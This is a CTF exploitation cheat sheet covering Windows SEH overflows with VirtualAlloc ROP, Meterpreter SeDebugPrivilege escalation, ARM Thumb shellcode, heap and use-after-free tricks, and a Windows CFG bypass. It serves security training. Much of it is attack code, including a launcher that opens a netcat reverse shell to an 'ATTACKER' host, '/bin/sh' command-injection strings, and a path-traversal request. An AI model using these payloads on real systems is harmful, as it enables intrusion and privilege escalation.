# CTF Pwn - Advanced Exploit Techniques (Part 4)

Windows exploitation, ARM shellcode, Forth interpreter exploitation, and GF(2) Gaussian elimination for heap corruption.

## Table of Contents
- [Windows SEH Overwrite + pushad VirtualAlloc ROP (RainbowTwo HTB)](#windows-seh-overwrite--pushad-virtualalloc-rop-rainbowtwo-htb)
- [SeDebugPrivilege to SYSTEM (RainbowTwo HTB)](#sedebugprivilege-to-system-rainbowtwo-htb)
- [ARM Buffer Overflow with Thumb Shellcode (HackIM 2016)](#arm-buffer-overflow-with-thumb-shellcode-hackim-2016)
- [Forth Interpreter Command Execution (32C3 2015)](#forth-interpreter-command-execution-32c3-2015)
- [GF(2) Gaussian Elimination for Multi-Pass Tcache Poisoning (Midnight Flag 2026)](#gf2-gaussian-elimination-for-multi-pass-tcache-poisoning-midnight-flag-2026)
- [Single-Bit-Flip Exploitation Primitive (PlaidCTF 2016)](#single-bit-flip-exploitation-primitive-plaidctf-2016)
- [Game of Life Shellcode Evolution via Still-Lifes (DEF CON Quals 2016)](#game-of-life-shellcode-evolution-via-still-lifes-def-con-quals-2016)
- [UAF via Menu-Driven strdup/free Ordering (PlaidCTF 2016)](#uaf-via-menu-driven-strdupfree-ordering-plaidctf-2016)
- [mmap/munmap Size Mismatch UAF for Thread Stack Overlap (0CTF 2017)](#mmapmunmap-size-mismatch-uaf-for-thread-stack-overlap-0ctf-2017)
- [Premature Global Index Update for Out-of-Bounds Stack Write (BKP 2017)](#premature-global-index-update-for-out-of-bounds-stack-write-bkp-2017)
- [strcspn as Indirect Null Byte Injection (BSidesSF 2017)](#strcspn-as-indirect-null-byte-injection-bsidessf-2017)
- [Windows CFG Bypass Using system() as Valid Call Target (Insomni'hack 2017)](#windows-cfg-bypass-using-system-as-valid-call-target-insomnihack-2017)

---

## Windows SEH Overwrite + pushad VirtualAlloc ROP (RainbowTwo HTB)

**Pattern:** 32-bit Windows PE (Portable Executable) with ASLR (Address Space Layout Randomization), DEP (Data Execution Prevention), and GS (stack cookie) enabled but SafeSEH disabled. Combine format string leak (defeats ASLR) with SEH-based (Structured Exception Handler) buffer overflow using VirtualAlloc ROP chain to bypass DEP.

**Attack chain:**
1. **Format string leak defeats ASLR:** User input used as printf format string leaks code pointer at position 2: `LST %p-%p-%p-%p-%p` -> `binary_base = int(leaks[1], 16) - 0x14120`
2. **Buffer overflow triggers SEH:** `sprintf("Path: %s", user_path)` into 1024-byte buffer overflows into SEH handler chain
3. **Stack pivot via SEH handler:** `add esp, 0xe10; ret` redirects from exception context into ROP chain
4. **Ret-slide absorbs crash variation:** 30x `ret` gadgets at start of ROP chain absorb variable crash offset
5. **pushad VirtualAlloc technique:** Set all 8 registers to correct values, then `pushad` builds the entire `VirtualAlloc(lpAddress, dwSize=1, flAllocationType=0x1000, flProtect=0x40)` call frame in one instruction
6. **IAT-relative function resolution:** `VirtualAlloc` not in IAT (Import Address Table), but `TlsAlloc` is. Read `[TlsAlloc@IAT]`, add offset to get `VirtualAlloc` address -- offset calculated from provided `kernel32.dll`
7. **jmp esp to shellcode:** After VirtualAlloc marks stack RWX (Read-Write-Execute), `jmp esp` executes shellcode that follows

```python
# Key ROP chain structure (simplified)
rop  = p32(base + RET) * 30              # ret-slide for stability

# Set flProtect = 0x40 (PAGE_EXECUTE_READWRITE) via subtraction (avoid nulls)
rop += p32(base + POP_EAX) + p32(0x8314c2ab)
rop += p32(base + SUB_EAX)               # sub eax, 0x8314c26b -> eax = 0x40

# Resolve VirtualAlloc: [TlsAlloc@IAT] + offset
rop += p32(base + POP_EAX) + p32(base + TLSALLOC_IAT)
rop += p32(base + MOV_EAX_DEREF_EAX)     # eax = TlsAlloc address
rop += p32(base + ADD_EAX_EDI)           # eax = VirtualAlloc address

# pushad builds call frame, jmp esp runs shellcode
rop += p32(base + PUSHAD_RET)
rop += p32(base + JMP_ESP)
```

**Bad characters for shellcode:** `\x00` (sprintf null), `\x09-\x0d` (whitespace), `\x20` (space), `\x25` (% triggers format string). Encode with msfvenom's shikata_ga_nai to avoid these bytes.

**Detached process for shell stability:** When exploiting thread-based servers, child processes die with the parent thread. Compile a launcher with `CREATE_NEW_PROCESS_GROUP | DETACHED_PROCESS` flags:
```c
// i686-w64-mingw32-gcc launcher.c -o launcher.exe -static
#include <windows.h>
int main() {
    STARTUPINFOA si = {0}; PROCESS_INFORMATION pi = {0};
    si.cb = sizeof(si);
    CreateProcessA(NULL, "C:\\shared\\nc.exe ATTACKER 9002 -e cmd.exe",
        NULL, NULL, FALSE,
        CREATE_NEW_PROCESS_GROUP | DETACHED_PROCESS | CREATE_NO_WINDOW,
        NULL, NULL, &si, &pi);
    return 0;
}
```

**Key insight:** `pushad` pushes all 8 general-purpose registers (EDI, ESI, EBP, ESP, EBX, EDX, ECX, EAX) onto the stack in one instruction. By pre-loading each register with the correct value, `pushad` builds the entire STDCALL function call frame in the exact order Windows expects. This avoids the need for `mov [esp+N], reg` gadgets which are rare.

---

## SeDebugPrivilege to SYSTEM (RainbowTwo HTB)

Exploits `SeDebugPrivilege` to escalate to SYSTEM by migrating into a SYSTEM-owned process. The privilege allows debugging any process, even if listed as "Disabled" -- Meterpreter enables it automatically before use.

**Steps:**
1. Upload Meterpreter payload and obtain a session
2. Migrate into a SYSTEM-level process:
```text
meterpreter > migrate -N winlogon.exe
meterpreter > getuid
# NT AUTHORITY\SYSTEM
```

Meterpreter's `migrate` injects a DLL into the target process (`winlogon.exe`, `lsass.exe`), running code as that process's user (SYSTEM).

**Detection:** `whoami /priv` shows `SeDebugPrivilege`. Common on service accounts and `NT AUTHORITY\SERVICE`.

**Key insight:** Always run `whoami /priv` after landing a Windows shell. `SeDebugPrivilege` -- even when shown as "Disabled" -- is a direct path to SYSTEM via process migration.

---

## ARM Buffer Overflow with Thumb Shellcode (HackIM 2016)

ARM exploitation differs from x86 in several key ways:

1. **Register conventions:** PC (program counter) instead of EIP; LR (link register) for return addresses
2. **Thumb mode:** Set bit 0 of target address to 1 to switch to Thumb (16-bit) instructions, which avoids null bytes more easily
3. **Syscall numbers:** Different from x86 (`execve` = 11, `dup2` = 63)

Socket-based ARM Thumb shellcode (dup2 + execve):

```asm
.syntax unified
.thumb
dup2_loop:
    mov  r1, r6          @ socket fd (leaked or known)
    mov  r0, #0          @ stderr=0, increment for stdout, stdin
    movs r7, #0x3f       @ __NR_dup2 = 63
    svc  #1
    add  r0, #1
    cmp  r0, #3
    blt  dup2_loop

execve:
    adr  r0, shell
    eor  r1, r1          @ argv = NULL
    eor  r2, r2          @ envp = NULL
    movs r7, #0xb        @ __NR_execve = 11
    svc  #1

shell: .ascii "/bin/sh\x00"
```

Cross-compile and test with QEMU:

```bash
arm-linux-gnueabi-as -mthumb -o sc.o shellcode.s
arm-linux-gnueabi-ld -o sc sc.o
qemu-arm -g 1234 ./sc  # Debug with gdb-multiarch
```

**Key insight:** Use `qemu-arm` for local testing and `gdb-multiarch` for debugging. Statically-linked ARM binaries contain all gadgets needed for ROP without library dependencies.

---

## Forth Interpreter Command Execution (32C3 2015)

Forth interpreters may expose a `system` word that executes shell commands. When interacting with a Forth-based service:

```forth
s" cat /flag" system
s" ls -la" system
s" /bin/sh" system
```

The `s"` word pushes a string address and length onto the stack; `system` pops them and executes via the shell. Check for other dangerous words: `included` (file inclusion), `open-file`, `read-file`.

---

## GF(2) Gaussian Elimination for Multi-Pass Tcache Poisoning (Midnight Flag 2026)

When a binary applies a deterministic XOR cipher to heap data (corrupting adjacent tcache `fd` pointers as a side effect), and each cipher seed produces a different XOR keystream at the fd offset, model the corruption as a linear algebra problem over GF(2) to find exactly which seeds transform the fd to a target address.

**Problem formulation:** Given current fd value `C` and target `T`, compute delta `D = C ^ T`. Each seed `i` produces a 64-bit XOR vector `v_i` at the fd offset. Find a subset `S` of seeds where `XOR(v_i for i in S) == D`.

```python
def find_subset_xor(vectors, target):
    """Find subset of 64-bit vectors that XOR to target via GF(2) Gaussian elimination"""
    n = len(vectors)
    basis = {}  # bit_position -> (vector_value, set_of_contributing_indices)

    for i, v in enumerate(vectors):
        mask = frozenset([i])
        val = v
        for bit in range(63, -1, -1):
            if not (val >> bit) & 1:
                continue
            if bit in basis:
                val ^= basis[bit][0]
                mask = mask.symmetric_difference(basis[bit][1])
            else:
                basis[bit] = (val, mask)
                break

    # Solve for target
    result = frozenset()
    val = target
    for bit in range(63, -1, -1):
        if (val >> bit) & 1:
            if bit not in basis:
                raise ValueError("Target not in span")
            val ^= basis[bit][0]
            result = result.symmetric_difference(basis[bit][1])
    return result

# Precompute XOR vectors: run cipher with each seed, extract 8 bytes at fd offset
vectors = {}
for seed in range(10000):
    keystream = djb2_cipher(seed, length=0x90)
    xor_at_fd = u64(keystream[0x88:0x90])  # fd is at offset 0x88 in chunk
    vectors[seed] = xor_at_fd

# Compute target delta (safe-linking aware)
current_fd = leaked_fd  # From heap over-read
target_fd = (io_list_all - 0x10) ^ (chunk_addr >> 12)  # Mangled target
delta = current_fd ^ target_fd

seeds_to_apply = find_subset_xor(vectors, delta)
# Apply each seed sequentially -- order doesn't matter (XOR is commutative)
for seed in seeds_to_apply:
    apply_cipher(chunk_idx, seed)
```

Typical result: ~30-35 seeds from a 10,000-seed space. Each application XORs one vector into the fd, cumulatively producing the exact target.

**Key insight:** Any deterministic byte-level transformation of heap metadata can be modeled as GF(2) linear algebra when the operation is XOR. This generalizes beyond specific cipher implementations -- it applies whenever you can repeatedly XOR predictable patterns into a target value.

---

## Single-Bit-Flip Exploitation Primitive (PlaidCTF 2016)

**Pattern (butterfly):** Binary accepts an integer, computes `address = input >> 3` and `bit = input & 7`, then flips `*address ^= (1 << bit)` after making the page RWX via `mprotect`. Single bit flip per invocation, but chaining multiple flips builds arbitrary code.

**Exploitation strategy:**

1. **Create a loop:** Flip a bit in the function epilogue `add rsp, 0x48` to `add rsp, 0x08`, causing stack misalignment that reuses buffer contents as return address. Set return address to function start for repeated invocations:
```python
# Flip bit 6 at address 0x400863 to change 0x48 -> 0x08
cosmic_ray = (0x400863 << 3) | 6  # = 33571614
```

2. **Craft `jmp rsp`:** Flip one bit of an existing `jmp rax` instruction (0xFF 0xE0) to `jmp rsp` (0xFF 0xE4):
```python
cosmic_ray = (0x4006E6 << 3) | 2  # = 33568562
```

3. **Disable stack canary check:** Flip the conditional jump (`jnz`) at the canary check to a non-branching instruction:
```python
# 0x75 (jnz) ^ 0x40 = 0x35 (xor eax, imm32)
cosmic_ray = (0x40085B << 3) | 6
```

4. **Expand input buffer:** Flip a bit in the `fgets` size argument to read more bytes for shellcode

5. **Make stack RWX:** Flip `mov r15, rbp` to `mov r15, rsp` so `mprotect` targets the stack

6. **Inject shellcode** on the now-RWX stack, return to `jmp rsp`

**Alternative approach:** XOR shellcode with existing `.text` bytes, compute which bits differ, flip each one, then redirect execution to the shellcode location.

**Key insight:** A single-bit-flip primitive becomes arbitrary code execution through cumulative modifications. Each flip changes one instruction or operand, and returning to the function start enables unlimited flips. Priority targets: (a) stack unwinding instructions (control flow hijack), (b) existing branch instructions (bypass security checks), (c) `mprotect` arguments (change memory permissions), (d) size parameters (expand read buffers).

---

## Game of Life Shellcode Evolution via Still-Lifes (DEF CON Quals 2016)

**Pattern (b3s23):** Binary reads coordinates for Conway's Game of Life cells on a 110x110 grid, runs 15 iterations, then executes the grid data as machine code. Construct a board that remains stable through 15 iterations while containing valid x86 shellcode.

**Approach — static shellcode rows:**

1. Place x86 instructions in specific rows of the grid
2. Use Game of Life "still-life" patterns (stable configurations) on surrounding rows to keep the shellcode rows unchanged through all iterations
3. Connect shellcode rows with `JMP` instructions to skip non-code rows

```text
Row N-1: still-life border pattern (keeps row N stable)
Row N:   >  shellcode bytes  | JMP to next row
Row N+1: still-life border pattern
Row N+2: (empty or border)
```

**Shellcode constraints:**
- Avoid 5+ consecutive 1-bits (no small still-life can stabilize these)
- Use `add al, 0` (0x04 0x00) as NOP separator between instructions (all bits off)
- Adjacent "wall" patterns (vertical columns of 1s) must match at boundaries
- Two columns of 0s between patterns prevents interference

**Useful still-life patterns for embedding:**
```text
Block:    xx     Snake:  xx x
          xx             x xx
```

```python
# Convert board to coordinates and feed to binary
import re
from pwn import *

rows = open('board.txt').read().split('\n')
coords = []
for y, row in enumerate(rows):
    for m in re.finditer('x', row):
        coords.append((m.start(), y))

p = process('./b3s23')
for x, y in coords:
    p.sendline(f'{x},{y}')
p.sendline('done')
p.interactive()
```

**Key insight:** Game of Life still-lifes are patterns unchanged by the update rules. By embedding shellcode in rows surrounded by still-life borders, the code survives all iterations. The simplest strategy is to `read()` real shellcode onto the grid after gaining execution, avoiding complex Game of Life-aware instruction encoding.

---

## UAF via Menu-Driven strdup/free Ordering (PlaidCTF 2016)

**Pattern (unix_time_formatter):** Menu-driven binary uses `strdup()` to allocate user input (format string, timezone) and `free()` on exit. Exit option frees allocations but asks "Are you sure?" — answering "no" returns to the menu with dangling pointers. New allocations via `strdup()` reuse the freed memory.

**Exploitation:**

1. Set format string (validated for safe characters: `%aAbBcC...`)
2. Set timezone (no input validation)
3. Choose exit → both pointers freed, but answering "no" continues
4. Set timezone twice — second `strdup()` reuses the format string's freed allocation
5. Format string pointer now points to attacker-controlled timezone data
6. "Print time" executes `system("/bin/date -d @TIME +'FORMAT'")` with injected format:

```python
from pwn import *

p = remote('target', 9999)
p.sendlineafter('>', '1')      # Set format
p.sendlineafter('Format:', '%c')
p.sendlineafter('>', '3')      # Set timezone
p.sendlineafter('zone:', "';/bin/sh #\\")
p.sendlineafter('>', '5')      # Exit (frees both)
p.sendlineafter('(y/N)?', 'n') # Don't actually exit
p.sendlineafter('>', '3')      # Reallocate into freed format slot
p.sendlineafter('zone:', "';/bin/sh #\\")
p.sendlineafter('>', '3')      # Second alloc gets other freed slot
p.sendlineafter('zone:', "';/bin/sh #\\")
p.sendlineafter('>', '4')      # Print → shell
p.interactive()
```

**Key insight:** `strdup()` uses `malloc()` internally, so freed `strdup` buffers enter the malloc freelist and are reused by subsequent `strdup()` calls of similar size. When the "exit" path frees memory but allows returning to the menu, any field with strict input validation (format) can be overwritten via a field without validation (timezone) through UAF freelist reuse. The `system()` call then executes the unvalidated content.

---

## mmap/munmap Size Mismatch UAF for Thread Stack Overlap (0CTF 2017)

**Pattern (UploadCenter):** A PNG upload service uses `mmap(width*height)` for image storage but `munmap(compressed_length)` to free it. When compressed length exceeds image dimensions, `munmap` frees more memory than was mapped, unmapping adjacent regions. Chain: (1) upload large PNG so its mmap lands adjacent to a global output buffer; (2) delete PNG — munmap frees both the image AND the output buffer; (3) spawn a thread — `pthread_create` mmaps a stack into the freed gap, overlapping the still-referenced output buffer; (4) upload new PNG — decompressed data written through the output buffer overwrites the thread's stack for ROP.

```python
# Trigger: allocation uses image dimensions, deallocation uses compressed size
# img = mmap(0, width*height, ...)      # small allocation
# pngobj->length = compressed_length     # larger than width*height
# munmap(pngobj->content, pngobj->length) # OVER-UNMAP!

# Exploit chain:
upload_png(large_png)        # mmap lands near global output buffer
delete_png()                 # munmap frees output buffer region too
start_monitor()              # pthread_create mmaps stack into freed gap
upload_rop_png(rop_payload)  # decompress writes through output buf -> thread stack
```

**Key insight:** The mmap/munmap size mismatch creates an "over-unmap" that silently destroys adjacent mappings. When a new thread's stack fills the gap, the old buffer pointer becomes a write-what-where into the thread's stack frame. This is a race-free UAF variant that doesn't require heap metadata corruption.

---

## Premature Global Index Update for Out-of-Bounds Stack Write (BKP 2017)

**Pattern (memo):** The `new_memo` function stores the user-supplied memo index into a global variable *before* validating bounds. The allocation is rejected for out-of-bounds values, but the global `last_memo` retains the invalid index. The `edit_memo` function uses `last_memo` without bounds checking, and the program stores stack pointers at indices 5-9 of the array during `new_memo`. Setting `last_memo=6` causes `edit_memo` to write through a stack address, enabling direct stack overwrites.

```python
# Bug: global index set BEFORE bounds check
# new_memo:
#   last_memo = user_index     # stored here
#   if user_index > 4: reject  # checked too late
#   memos[user_index + 5] = &stack_local  # stack addr in array!

# Exploit:
new_memo(6)      # rejected, but last_memo = 6
# memos[11] = stack pointer from new_memo's frame
edit_memo(payload)  # writes through memos[6] which IS a stack address
# payload overwrites return address -> hidden shellcode executor function
```

**Key insight:** TOCTOU-style vulnerability in a single function — the index is committed to global state before validation rejects it. Combined with the program storing stack addresses in the same array, this turns an invalid index into a direct stack write primitive. Look for patterns where global state is updated before error checking.

---

## strcspn as Indirect Null Byte Injection (BSidesSF 2017)

**Pattern (Steel Mountain: Sensors):** A CGI binary constructs filenames via `snprintf("sensors/%s.cfg", input)`. Direct null byte injection is blocked by the CGI library. After snprintf, `strcspn(buf, "\r\n")` is called and the result index is used to write a null byte (terminating at the first newline). Injecting `%0A` (URL-encoded newline) after the desired filename causes: `sensors/../flag.txt\n.cfg` → null byte written at the `\n` position → `sensors/../flag.txt\0.cfg`, truncating the `.cfg` extension.

```bash
# Request: sensor=../flag.txt%0A&debug
# snprintf produces: "sensors/../flag.txt\n.cfg"
# strcspn("sensors/../flag.txt\n.cfg", "\r\n") = 23
# buf[23] = '\0'
# Result: "sensors/../flag.txt" (null-terminated, .cfg removed)
# -> reads /flag.txt via path traversal
```

**Key insight:** `strcspn` followed by null-byte write is a common C pattern for line termination. When user input reaches this code path with injected newlines, it becomes an indirect null byte injection vector — even when direct null bytes are filtered by the input layer (CGI, HTTP).

---

## Windows CFG Bypass Using system() as Valid Call Target (Insomni'hack 2017)

**Pattern:** Windows Control Flow Guard (CFG) validates indirect call targets at runtime, but `system()` from msvcrt is a valid CFG target, enabling exploitation via function pointer overwrite.

```python
from pwn import *

# On Windows with CFG, overwrite function pointer with system()
# system() is a valid call target in CFG bitmap — it's a legitimate API entry point
# CFG only validates that the target is a valid function start, not WHICH function

# If input filter blocks space (0x20), use comma as argument separator
# cmd.exe treats comma as equivalent to space in argument lists
payload = b"type,flag.txt&whoami^/all\x00"
# 'type,flag.txt' works because cmd.exe treats comma as argument separator
# ^ escapes the / character
# & chains commands

# Exploit chain:
# 1. Leak module base (defeat ASLR)
# 2. Find system() address via IAT or known offset in msvcrt
system_addr = msvcrt_base + system_offset

# 3. Overwrite a function pointer (vtable entry, callback, etc.)
write_addr(vtable_entry, system_addr)

# 4. Trigger the indirect call with controlled first argument
# The overwritten pointer now calls system(attacker_string)
trigger_call(payload)
```

```c
// Alternative: if building a local exploit, bypass character filters
// Comma replaces space, ^ escapes special chars
// system("type,flag.txt") == system("type flag.txt")
// system("cmd,/c,dir") == system("cmd /c dir")
```

**Key insight:** CFG only validates that the target is a valid function entry point -- it does not restrict which function is called. Since `system()` is a legitimate API exported by msvcrt, it passes CFG validation. Use comma instead of space and `^` for escaping when the input filter restricts certain characters. This applies to any Windows binary with CFG where you can overwrite an indirect call target.

**When to recognize:** Windows binary with CFG enabled (check with `dumpbin /headers` or `winchecksec`). Look for writable function pointers (vtables, callbacks, C++ objects) that are called via indirect `call [reg]` instructions. CFG prevents jumping to arbitrary code but allows calling any valid function.

**References:** Insomni'hack 2017

---

See [advanced-exploits.md](advanced-exploits.md) for VM signed comparison, BF JIT shellcode, type confusion, ASAN shadow memory, format string with encoding constraints, MD5 preimage gadgets, VM GC UAF, FSOP + seccomp bypass, and stack variable overlap techniques.

See [rop-advanced.md](rop-advanced.md) for `.fini_array` hijack details.

See [sandbox-escape.md](sandbox-escape.md) for shell tricks and restricted environment techniques.